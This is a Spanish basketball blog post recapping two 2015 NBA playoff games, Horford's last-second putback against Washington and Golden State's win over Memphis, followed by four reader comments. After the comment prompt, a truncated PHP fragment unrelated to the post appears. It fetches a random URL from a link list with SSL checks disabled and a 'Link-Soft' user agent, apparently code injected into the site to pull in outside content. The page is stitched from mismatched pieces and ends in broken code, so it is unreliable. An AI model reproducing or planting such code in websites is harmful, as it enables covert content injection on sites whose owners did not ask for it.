La Crónica: Acto de fe

14 de May de 2015 por txusma

Cuando las cosas no funcionan como a ti te gustaría has de tirar de coraje y de fe. Eso fue lo que hizo Al Horford para llevarse el rebote ofensivo en una jugada en la que en teoría sólo tenía que limitarse a mirar. Mientras, los Warriors superaron sin problemas a los Grizzlies y espantan los fantasmas que habían aparecido tras sus dos derrotas consecutivas.

Washington Wizards 81 – Atlanta Hawks 82

John Wall parecía querer exigir íntegramente el protagonismo del partido al anunciarse unos minutos antes del inicio que sería titular a pesar de sufrir varios fisuras en su mano izquierda pero al final la estrella y el héroe del encuentro no fue él sinó el dominicano Al Horford. Los Hawks siguen lejos del nivel que mostraron en enero y encadenaron buenos momentos con auténticas desconexiones que permitían a los Wizards meterse de nuevo en el partido e incluso marcharse en el marcador. Atlanta entró por delante al último cuarto pero un parcial de 11-1 a favor de los visitantes encendió todas las alarmas de la parroquia local. Un triple de Kyle Korver (su única canasta del partido) y otro de Horford igualaron de nuevo el marcador y dieron paso a unos últimos minutos de infarto. El dominicano empezó a reclamar toda la atención con otra canasta y un tapón a Wall que dieron ventaja a los suyos y Dennis Schroeder (en pista con la bendición de Jeff Teague) acabó de completar lo que había sido un parcial de 14-0 en menos de 4 minutos de juego. En ese momento apareció Paul Pierce para rescatar a los Wizards con dos triples, el segundo a falta de 8 segundos que ponía a los suyos 1 arriba. Tiempo muerto local y jugada para el alemán Schroeder. Al Horford se tenía que limitar a poner un bloqueo para Korver pero al ver a su compañero entrar a canasta se lanzó como un poseso hacía la zona y pescó el rebote ofensivo sobre Nene a pesar de llegar desde atrás en un auténtico acto de fe. Tras hacerse hueco bajo la canasta, el dominicano sólo tuvo que dejar la pelota suavemente en la canasta. En el marcador solo restaba 1 segundo y 9 décimas, demasiado poco para unos Wizards sin tiempos muertos. 

MVP: Al Horford (23 puntos, 11 rebotes, 5 tapones)

Memphis Grizzlies 78 – Golden State Warriors 98

Hace poco discutíamos en algun foro que aparte de Gasol, Randolph y Conley el resto de los jugadores de los Grizzlies iban muy justitos de calidad. Ayer no faltó ninguno de los 3 magníficos sinó Tony Allen y ahí tenéis el resultado. Sin la defensa de Allen los tiradores de los Warriors se vieron mucho más libres y acribillaron a sus rivales con 14 triples de 30 intentos. El propio Stephen Curry anotó 4 en el primer cuarto, 6 en total y Klay Thompson, Harrison Barnes y Andre Iguodala también se sumaron a la fiesta. En el primer cuarto los Grizzlies se llegaron a escapar de 13 puntos de la mano de Zach Randolph pero rápidamente Curry puso las cosas en su sitio y con un triple a falta de 2 segundos puso a los suyos por delante por primera y última vez porque no hizo falta más. Los visitantes aguantaron el tirón en los primeros compases del segundo cuarto pero un parcial de 13-2 a favor de los Warriors rompió el partido de manera definitiva. En ningún momento de la 2ª parte dio la impresión de que los Grizzlies pudieran remontar el partido. Marc Gasol seguía peleando pero no pudo evitar que la diferencia creciera hasta los 17 puntos y que el último cuarto fuera de trámite por segundo partido consecutivo.

MVP: Stephen Curry (18 puntos, 7 rebotes, 5 asistencias y 6 robos)

Comenta

4 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Bueno, obviamente el trabajo defensivo de Allen no lo vamos a descubrir ahora… podríamos poner en la misma cuerda a Bogut, aunque para mi ahora mismo es más importante en la liga el pívot de los warriors en ese sentido.

    El gran problema de los Grizzlies es a parte de los tres buenos, nadie es capaz de ver aro. El propio Allen y Lee en algún contraataque, pero el resto es la agonía más absoluta. Jeff Green ha sido un blufazo monumental y para mí aún es más evidente en esta serie, Udrih y Vince no están para estas batallas. Calathes, Koufos… cada minuto que están en pista es un puñetero parto.

    Los Warriors, ante la mejor defensa de la liga, además de los Splash Bross, Barnes lo está haciendo muy bien, Bogut, Draymond está aportando muchísimo aunque no esté tan atinado como otras veces y se les ha unido Iguodala, que el hombre siempre ha tenido cualidades para que no suponga demasiada sorpresa. Speights ha tenido problemas y no ha podido aportar, pero en el fondo del banquillo (ya he nombrado a 7 tíos útiles) tienen a Livingston, un ex-all star como David Lee, a Barbosa que rara vez molesta y a Ezeli…
    Es que las comparaciones son más odiosas que nunca.

      Citar

  2. rumbero dice:
    #2

    El partido que van a perder los Clippers, alucinante. Vaya último cuarto…y Josh Smith enchufando más que en los últimos 3 años juntos.

      Citar

  3. Jose Luis dice:
    #3

    Clippers… xddddd

      Citar

  4. Jose Luis dice:
    #4

    De todas formas, no sé… aún les veo con buenas opciones de clasificar. Y contra los Warriors casi lo veo al 50%, o 55%-45% a favor de GSW.

    Creo que Clippers ha jugado bien los PO, aunque ahora estén mal. Si ganan a Rockets será otro subidón de moral.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>